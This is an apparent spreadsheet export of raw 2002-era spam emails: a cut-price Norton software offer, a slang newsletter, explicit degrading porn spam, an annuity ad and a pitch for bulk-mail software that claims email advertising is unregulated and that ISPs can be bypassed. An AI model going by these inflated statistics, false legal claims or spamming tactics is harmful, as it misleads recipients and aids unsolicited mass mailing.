 Verdana, Arial, Helvetica, sans-serif" color=3D"#000099" size=3D"5"&gt;&lt;b&gt;Nor=
 ton
             SystemWorks 2002 Software Suite&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F00"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; =
 - Feature-Packed Utilities&lt;br&gt;ALL
             for &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF00"&gt;=
 1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 00"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"115" bgcolor=3D"#000080=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"109"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D=
 "2" color=3D"#FFFF00"&gt;This Software Will:&lt;/font&gt;&lt;font face=3D"Tahoma" size=
 =3D"2" color=3D"#FFFFFF"&gt;&lt;br&gt;- Protect your
             computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt; viruses&lt;br&gt;- Help=
  secure your
             private &amp;amp; valuable information&lt;br&gt;- Allow you to transfer =
 files
             and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;- Backup your ALL your data=
  quick and
             easily&lt;br&gt;- Improve your PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5"&gt;&lt;font=
  color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;Feature-Packed Utilities&lt;br&gt;&lt;/f=
 ont&gt;&lt;font color=3D"#000000"&gt;
             &lt;/font&gt;&lt;u&gt;&lt;font color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;/u&gt;&lt;u&gt;&lt;font color=3D=
 "#000000"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000080"&gt; Great
             Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000"&gt; &lt;br&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;
             A&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font color=3D"#ff0000"&gt;$300+=
 &lt;/font&gt;  &lt;/font&gt;&lt;font color=3D"#000080"&gt; Combined Retail Value
             &lt;i&gt;YOURS&lt;/i&gt; for Only&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font col=
 or=3D"#ff0000"&gt;$29.99!&lt;/font&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"4"&gt;&lt;font color=3D=
 "#000080"&gt;&amp;lt;Includes
             &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font color=3D"#0000=
 80"&gt; Shipping!&amp;gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial, Helvetica, sans-serif"  c=
 olor=3D"#ffffff"&gt;Don't fall prey to destructive viruses
     or hackers!&lt;br&gt;Protect&amp;nbsp; your computer and your valuable  informat=
 ion
     and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"1" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 FFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#0000FF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"4" color=3D"#FFFFFF"&gt;
           &lt;a style=3D"color: #FFFFFF; font-family: Verdana; font-size: 14p=
 t; font-weight: bold" href=3D"http://www.deal2002.com/systemworks1.htm"&gt;-&amp;=
 gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"5"&gt;
       &lt;a style=3D"text-decoration: none; background-color: rgb(255,255,0);=
  color: #0000FF" href=3D"http://www.deal2002.com/systemworks1.htm"&gt;Click
       here for more information&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#fffff=
 f"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
       &lt;/font&gt;&lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D=
 "Tahoma"&gt;Your
       email address was obtained from an opt-in list. Opt-in MRSA List&lt;br&gt;
       &amp;nbsp;Purchase Code # 312-1-010.&amp;nbsp;&amp;nbsp;If you wish to be unsubs=
 cribed
       from this list, please &lt;a style=3D"COLOR: #ffffcc" href=3D"mailto:re=
 moveme@btamail.net.cn?Subject=3DUnsubcribe Immediately"&gt;Click
       here&lt;/a&gt; and press send to be removed. If you have previously unsubs=
 cribed
       and are still receiving this message, you may email our &lt;a style=3D"=
 COLOR: #ffffcc" href=3D"mailto:sortofridiculous@bigfoot.com?Subject=3DAbus=
 e Report"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject:      Slang of the Day! &gt; "blimp"
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_Part_4_3760560.1027544231676
 Content-Type: text/plain; charset=us-ascii
 Content-Transfer-Encoding: 7bit
 Look at that blimp! He must eat six meals a day.Are you a "blimp"?Go to  http://www.peakenglish.com/exec/slangSearchForm?command=detail&amp;wordId=33460 to find out!PEAK English (http://www.peakenglish.com ) is the fun place to learn English on the Internet!SEND THIS EMAIL TO A FRIEND!To unsubscribe, send an email to listserv@listserv.dli.com with the message UNSUBSCRIBE DAILYSLANG in the body of the message.Copyright 2002 Distance Learning, Inc. All rights reserved
 ------=_Part_4_3760560.1027544231676
 Content-Type: text/html
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;&lt;head&gt;&lt;title&gt;Slang of the Day&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor=3D"#FFFFFF"=
  leftmargin=3D0 marginheight=3D0 marginwidth=3D0 topmargin=3D0&gt;&lt;div align=
 =3D"left"&gt;&lt;table border=3D0 cellpadding=3D0 cellspacing=3D0 width=3D500&gt;=09=
 &lt;tr&gt;&lt;td align=3D"left"&gt;&lt;br&gt;&lt;img src=3D"http://grafx.dli.com/peakenglish/ima=
 ges/slang_top.gif" width=3D"500" height=3D"60" hspace=3D"0" vspace=3D"0" bo=
 rder=3D"0" alt=3D""&gt;&lt;br&gt;&lt;/td&gt;=09&lt;/tr&gt;&lt;/table&gt;&lt;table border=3D0 cellpadding=
 =3D3 cellspacing=3D10&gt;&lt;tr&gt;&lt;td align=3D"left"&gt;&lt;br&gt;&lt;IMG SRC=3D"http://grafx.d=
 li.com/peakenglish/images/spacer.gif" WIDTH=3D160 HEIGHT=3D1&gt;&lt;a href=3D"htt=
 p://www.peakenglish.com/exec/slangSearchForm?command=3Ddetail&amp;wordId=3D3346=
 0"&gt;&lt;img SRC=3D"http://grafx.dli.com/slang/images/80/blimp_80.jpg" BORDER=3D=
 0 &gt;&lt;/a&gt;&lt;/td&gt;=09&lt;/tr&gt;&lt;/table&gt;&lt;table border=3D0 cellpadding=3D3 cellspacing=
 =3D0 width=3D500&gt;=09&lt;tr&gt;=09=09&lt;td align=3D"left"&gt;&lt;br&gt;&lt;font face=3D"Verdana"=
  size=3D"2" color=3D"#333399"&gt;"Look at that blimp! He must eat six meals a =
 day."&lt;/font&gt;&lt;br&gt;&lt;/td&gt;=09&lt;/tr&gt; =09&lt;tr&gt;=09=09&lt;td align=3D"left"&gt;&lt;br&gt;&lt;font fac=
 e=3D"Verdana" size=3D"2" color=3D"#0000FF"&gt;Are you a "blimp"?&amp;nbsp;&lt;BR&gt;Clic=
 k on the picture (or &lt;a href=3D"http://www.peakenglish.com/exec/slangSearch=
 Form?command=3Ddetail&amp;wordId=3D33460"&gt;here&lt;/a&gt;) to find out! (Or go to http=
 ://www.peakenglish.com/exec/slangSearchForm?command=3Ddetail&amp;wordId=3D33460=
  to see today's slang.)&lt;/font&gt;&lt;/td&gt;=09&lt;/tr&gt;=09&lt;tr&gt;=09=09&lt;td align=3D"left"&gt;=
 &lt;br&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D"#333399"&gt;PEAK English&lt;/font&gt;=
  (&lt;a href=3D"http://www.peakenglish.com"&gt;&lt;font face=3D"Verdana" size=3D"2" =
 color=3D"#333399"&gt;www.peakenglish.com&lt;/font&gt;&lt;/a&gt;) &lt;font face=3D"Verdana" si=
 ze=3D"2" color=3D"#333399"&gt;is the fun place to learn English on the Interne=
 t!&lt;/font&gt;&lt;/td&gt;=09&lt;/tr&gt;=09&lt;tr&gt;=09=09&lt;td&gt;&lt;font face=3D"Verdana" size=3D"2" co=
 lor=3D"#333399"&gt;--------------------&lt;/font&gt;&lt;/td&gt;=09&lt;/tr&gt;=09&lt;tr&gt;=09=09&lt;td al=
 ign=3D"left"&gt;&lt;br&gt;&lt;font face=3D"Verdana" size=3D"2" color=3D"#333399"&gt;SEND T=
 HIS EMAIL TO A FRIEND!&lt;/font&gt;&lt;/td&gt;=09&lt;/tr&gt;=09&lt;tr&gt;=09=09&lt;td align=3D"left"&gt;&lt;=
 br&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#333399"&gt;(To unsubscribe, sen=
 d an email to listserv@listserv.dli.com &lt;BR&gt;=09=09with the message UNSUBSCR=
 IBE DAILYSLANG in the body of the message.)&lt;/font&gt;&lt;/td&gt;=09&lt;/tr&gt;=09&lt;tr&gt;=09=
 =09&lt;td align=3D"left"&gt;&lt;br&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#33339=
 9"&gt;&amp;#169; 2002 Distance Learning, Inc. All rights reserved.&lt;/font&gt;&lt;/td&gt;=09&lt;=
 /tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
 ------=_Part_4_3760560.1027544231676--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sickest Bitches.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 6.00.2712.300" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P&gt;Beaton Abused, Humiliated and Begging For More!!!&lt;BR&gt;Our Sluts Won't 
 Disappoint!!&lt;BR&gt;&lt;BR&gt;&lt;B&gt;&lt;FONT size=5&gt;&lt;A 
 href="http://2f.free3host.net/site3/"&gt;Click Here&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;B&gt;&lt;FONT size=2&gt;YOU MUST BE AT LEAST 18 TO ENTER!&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT 
 size=2&gt;=============================================================&lt;BR&gt;To be 
 removed from our "in house" mailing list &lt;A 
 href="http://2f.free3host.net/site3/takemeoff.html"&gt;CLICK HERE&lt;/A&gt;&lt;BR&gt;and you 
 will automatically be removed from future mailings.&lt;BR&gt;&lt;BR&gt;You have received 
 this email by either requesting more information&lt;BR&gt;on one of our sites or 
 someone may have used your email address.&lt;BR&gt;If you received this email in 
 error, please accept our 
 apologies.&lt;BR&gt;=============================================================&lt;/FONT&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 6% AVG Guaranteed for 5 Years
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1F32E9_01C1F449.C9876C50
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  6% Average Annual Yield=09
  Simplicity At It's Best=09
  Fidelity &amp; Guaranty Life Platinum Plus=09
  -5 Year Guarantee=0A=
 -5 Year Surrender=0A=
 -Interest Only Payments=0A=
 -3.00%
 Comission (0-79) =09
  Spectacular 2003 Convention=0A=
 Hyatt Regency=0A=
 Kauai, Hawaii=20
  Rates Effective 05/01/2002 - Rates Subject to Change
  =20
 Call or e-mail &lt;mailto:info@signaturefin.com&gt;  us Today!
  800-828-1910
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 or visit us online at: www.SignatureFinancial.com
 &lt;http://www.signaturefinancial.com&gt; =20
   Signature Financial Services
 *1.50% Commission ages 80-90, age nearest. Products issued by Fidelity &amp;
 Guaranty Life, Baltimore, MD
 In certain states products and/or riders may not be available. =09
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 =20
 ------=_NextPart_000_1F32E9_01C1F449.C9876C50
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;6% AVG Guaranteed for 5 Years&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"2" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#99CCFF"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-101.jpg" =
 width=3D"550" height=3D"124" alt=3D"6% Average Annual Yield"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-102.gif" =
 width=3D"550" height=3D"92" alt=3D"Simplicity At It's Best"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-103.gif" =
 width=3D"550" height=3D"94" alt=3D"Fidelity &amp;amp; Guaranty Life Platinum =
 Plus"&gt;&lt;/td&gt;
         &lt;/tr&gt;
           &lt;td&gt;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-104.gif" =
 width=3D"439" height=3D"161" alt=3D"-5 Year Guarantee&amp;#10;-5 Year =
 Surrender&amp;#10;-Interest Only Payments&amp;#10;-3.00% Comission (0-79)"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-105.gif" =
 width=3D"111" height=3D"161"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"right"&gt; &lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-107.jpg" =
 width=3D"389" height=3D"214" alt=3D"Spectacular 2003 =
 Convention&amp;#10;Hyatt Regency&amp;#10;Kauai, Hawaii"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-108.gif" =
 width=3D"111" height=3D"214"&gt;&lt;br&gt;
             &lt;font size=3D"1" face=3D"Arial, Helvetica, sans-serif"&gt;=20
             &lt;div align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/spacer.gif" width=3D"45" =
 height=3D"9"&gt;Rates=20
               Effective 05/01/2002 - Rates Subject to Change&lt;/div&gt;
             &lt;/font&gt;
             &amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Call or &lt;a =
 href=3D"mailto:info@signaturefin.com"&gt;e-mail&lt;/a&gt; us Today!&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-110.gif" =
 width=3D"533" height=3D"90" alt=3D"800-828-1910"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Please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value=3D"info@signaturefin.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Signature Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;b&gt;&lt;font size=3D"4"&gt;or visit us online at:&lt;a =
 href=3D"http://www.signaturefinancial.com"&gt;=20
             www.SignatureFinancial.com&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td&gt;&lt;br&gt;
             &amp;nbsp;&lt;img =
 src=3D"http://63.211.81.87/images/sig/0502/20020429-2.gif" width=3D"342" =
 height=3D"89" alt=3D"Signature Financial Services"&gt;&lt;br&gt;
             &lt;font size=3D"1" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
             *1.50% Commission ages 80-90, age nearest. Products issued =
 by Fidelity=20
             &amp;amp; Guaranty Life, Baltimore, MD&lt;br&gt;
             In certain states products and/or riders may not be =
 available. &lt;/font&gt;&lt;/td&gt;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&lt;img height=3D'1' width=3D'1' border=3D'0' src=3D'304704'&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1F32E9_01C1F449.C9876C50--
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;STYLE&gt;BODY {
 	FONT-FAMILY: "Arial"
 }
 TT {
 	FONT-FAMILY: "Courier New"
 }
 BLOCKQUOTE.CITE {
         PADDING-LEFT: 2.6em; MARGIN: 0px; BORDER-LEFT: 2px solid
 }
 SPAN.TABOOHEADER {
 	DISPLAY: none
 }
 &lt;/STYLE&gt;
 &lt;META content="MSHTML 6.00.2712.300" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#330099&gt;&lt;SPAN class=EUDORAHEADER&gt;&lt;BR&gt;&lt;/SPAN&gt;&lt;SPAN class=EUDORAHEADER&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;TABLE borderColor=#000000 cellSpacing=0 cellPadding=0 width=500 align=center 
 bgColor=#ffffff border=3&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#ccccff&gt;
       &lt;DIV align=center&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#000000&gt;
             &lt;DIV align=center&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif"&gt;&lt;FONT 
             color=yellow size=5&gt;&lt;BR&gt; Email Advertise to 28,000,000 People for FREE
             &lt;BR&gt;&lt;/B&gt;&lt;FONT color=yellow size=3&gt;Act Now Before 6pm PST on Tuesday, May 28th&lt;BR&gt;
             and Receive a &lt;U&gt;&lt;B&gt;FREE $899.00 Bonus&lt;/U&gt;&lt;/B&gt;&lt;BR&gt;
             &lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;/DIV&gt;
       &lt;P align=left&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif"&gt;&lt;FONT 
       color=#CCFFFF size=2&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;BLOCKQUOTE&gt;
         &lt;P&gt;&lt;FONT face="Arial, Helvetica, sans-serif" color=#000000 
         size=2&gt;&lt;BR&gt;
 1) Let's say you... Sell a $24.95 PRODUCT or SERVICE.&lt;BR&gt;
 2) Let's say you... Broadcast Email FREE to 500,000 PEOPLE DAILY.&lt;BR&gt;
 3) Let's say you... Receive JUST 1 ORDER for EVERY 2,500 EMAILS.&lt;BR&gt;
 &lt;BR&gt;
 CALCULATION OF YOUR EARNINGS BASED ON THE ABOVE STATISTICS:&lt;BR&gt;
 [Day 1]: $4,990  [Week 1]: $34,930  [Month 1]: $139,720&lt;BR&gt;
 &lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 You now know why you receive so many email advertisements...&lt;BR&gt;
 ===&gt; BROADCAST EMAIL ADVERTISING IS EXTREMELY PROFITABLE!&lt;BR&gt;&lt;BR&gt;
 1) What if you... Sell a $99.95 PRODUCT or SERVICE?&lt;BR&gt;
 2) What if you... Broadcast Email to 30,000,000+ PEOPLE MONTHLY?&lt;BR&gt;
 3) What if you... Receive 1 ORDER for EVERY 250 EMAILS?&lt;BR&gt;&lt;BR&gt;
 Just IMAGINE =&gt; DAY 30! ==&gt; WEEK 30!! ===&gt; MONTH 30!!!&lt;BR&gt;&lt;BR&gt;
 ==&gt; The PROFITS that Broadcast Email CAN GENERATE are AMAZING!!&lt;BR&gt;&lt;BR&gt;
 ** According to Forrester Research, a Broadcast Email Ad is up&lt;BR&gt;
 ** to 15 TIMES MORE LIKELY to Result in a Sale than a Banner Ad!&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 [COMPARISON OF INTERNET ADVERTISING METHODS]:&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; A 1/20 Page Targeted Web Site Banner Ad to 5 Million People&lt;BR&gt;
    on the Internet can cost you about $100,000.&lt;BR&gt;&lt;BR&gt;
 =&gt; A 5 Page Targeted Direct Mail Advertisement to 1 Million People&lt;BR&gt;
    through the Postal Service can cost you about $500,000.&lt;BR&gt;&lt;BR&gt;
 =&gt; A 50 Page Targeted HTML Broadcast Email Advertisement with&lt;BR&gt;
    Pictures to 50,000,000 People through the Internet is Free.&lt;BR&gt;&lt;BR&gt;
 ...Which advertising method sounds most appealing to you?&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 "Targeted direct email advertising is the wave of the future.&lt;BR&gt;
  By no other means can you effectively reach your market so&lt;BR&gt;
  quickly and inexpensively." - ONLINE PROFITS NEWSLETTER&lt;BR&gt;&lt;BR&gt;
 "Many business people are finding out that they can now advertise&lt;BR&gt;
  in ways that they never could have afforded in the past.  The&lt;BR&gt;
  cost of sending mass e-mail is extremely low, and the response&lt;BR&gt;
  rate is high and quick." - USA TODAY&lt;BR&gt;
 &lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 [EXAMPLE OF A PERSONALIZED/TARGETED BROADCAST EMAIL]:&lt;BR&gt;
 -------- ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 From: kate@cattiesinc.com&lt;BR&gt;
 To: mary@commtomm.com&lt;BR&gt;
 Subject: About Your Cat!&lt;BR&gt;&lt;BR&gt;
 Hi Mary,&lt;BR&gt;&lt;BR&gt;
 Are you interested in receiving up to 80% SAVINGS on CAT SUPPLIES?&lt;BR&gt;
 If so, come visit our web site at: http://www.cattiesinc.com&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; With Broadcast Email Software, a Broadcast Email Advertisement&lt;BR&gt;
 =&gt; like this one can be AUTOMATICALLY sent to up to 1,000,000&lt;BR&gt;
 =&gt; PEOPLE on a DAILY BASIS with LESS than 2 MINUTES of YOUR TIME!&lt;BR&gt;&lt;BR&gt;
 * IMT Strategies Reports an AVERAGE of a 16.4% CLICK THROUGH RATE&lt;BR&gt;
   from users that have received a Broadcast Email Advertisement!&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 A EUROPEAN 2001 BENCHMARK STUDY&lt;BR&gt;
 Conducted by Forrester Research Says:&lt;BR&gt;&lt;BR&gt;
 1) 41% of Consumers Believe Email is a Good Way to Find out About&lt;BR&gt;
    New Products.&lt;BR&gt;&lt;BR&gt;
 2) 36% of Consumers in 13 Countries Read Most of the Promotional&lt;BR&gt;
    Email they Receive and 9% Forward the Email to a Friend Because&lt;BR&gt;
    They Think it is Valuable.&lt;BR&gt;&lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 BE PREPARED!  You may receive A HUGE AMOUNT of orders within&lt;BR&gt;
 minutes of sending out your first Broadcast Email Advertisement!&lt;BR&gt;&lt;BR&gt;
 * According to Digital Impact, 85% of Broadcast Email Offers are&lt;BR&gt;
   responded to within the FIRST 48 HOURS!&lt;BR&gt;&lt;BR&gt;
 "When you reach people with e-mail, they're in a work mode, even&lt;BR&gt;
  if they're not at work.  They're sitting up, they're alert.  You&lt;BR&gt;
  catch them at a good moment, and if you do it right, you have a&lt;BR&gt;
  really good shot of having them respond."&lt;BR&gt;
  - WILLIAM THAMES [Revnet Direct Marketing VP]&lt;BR&gt;&lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 * An Arthur Anderson Online Panel reveals that 85% of Online Users&lt;BR&gt;
   say that Broadcast Email Advertisements have LED TO A PURCHASE!"&lt;BR&gt;&lt;BR&gt;
 "According to FloNetwork, US Consumers DISCOVER New Products and&lt;BR&gt;
  Services 7+ TIMES MORE OFTEN through an Email Advertisement,&lt;BR&gt;
  than through Search Engines, Magazines and Television COMBINED!"&lt;BR&gt;&lt;BR&gt;
 Only a HANDFUL of Companies on the Internet have Discovered&lt;BR&gt;
 Broadcast Email Advertising... =&gt; NOW YOU CAN BE ONE OF THEM!!&lt;BR&gt;&lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 =&gt; United Messaging says there are 890+ MILLION EMAIL ADDRESSES!&lt;BR&gt;
 =&gt; GET READY!  Now with Broadcast Email, You Can Reach them ALL&lt;BR&gt;
 =&gt; Thanks to our Broadcast Email Software!&lt;BR&gt;&lt;BR&gt;
 Our Broadcast Email Software with DNS Technology Automatically&lt;BR&gt;
 Creates 10 SUPER-FAST MAIL SERVERS on Your COMPUTER which are&lt;BR&gt;
 then used to Send out Your Broadcast Emails to MILLIONS for FREE!&lt;BR&gt;&lt;BR&gt;
 ==&gt; With our NEW EMAIL SENDING TECHNOLOGY...&lt;BR&gt;
 ==&gt; Your Internet Provider's Mail Servers are NOT USED!&lt;BR&gt;&lt;BR&gt;
 There are NO Federal Regulations or Laws on Email Advertising &amp;&lt;BR&gt;
 Now with Our Software =&gt; You Can Avoid Internet Provider Concerns!&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; If you send a Broadcast Email Advertisement to 50,000,000&lt;BR&gt;
 =&gt; People and Just 1 of 5,000 People Respond, You Can Generate&lt;BR&gt;
